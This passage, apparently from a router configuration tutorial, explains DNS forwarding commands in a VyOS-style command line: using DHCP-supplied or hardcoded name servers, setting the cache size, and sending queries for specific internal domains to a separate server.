# Use servers received from DHCP on eth1 (typically an ISP interface)
set service dns forwarding dhcp eth1

# Use a hardcoded name server
set service dns forwarding name-server 192.0.2.10

You can also specify cache size:

set service dns forwarding cache-size 1000

One of the less known features is the option to use different name servers for different domains. It can be used for a quick and dirty split-horizon DNS, or simply for using an internal server just for internal domains rather than recursive queries:

set service dns forwarding domain mycompany.local server 192.168.52.100
set service dns forwarding domain mycompany.example.com server 192.168.52.100

And that's all to it. DNS forwarding is not a big feature — useful doesn't always equal complex.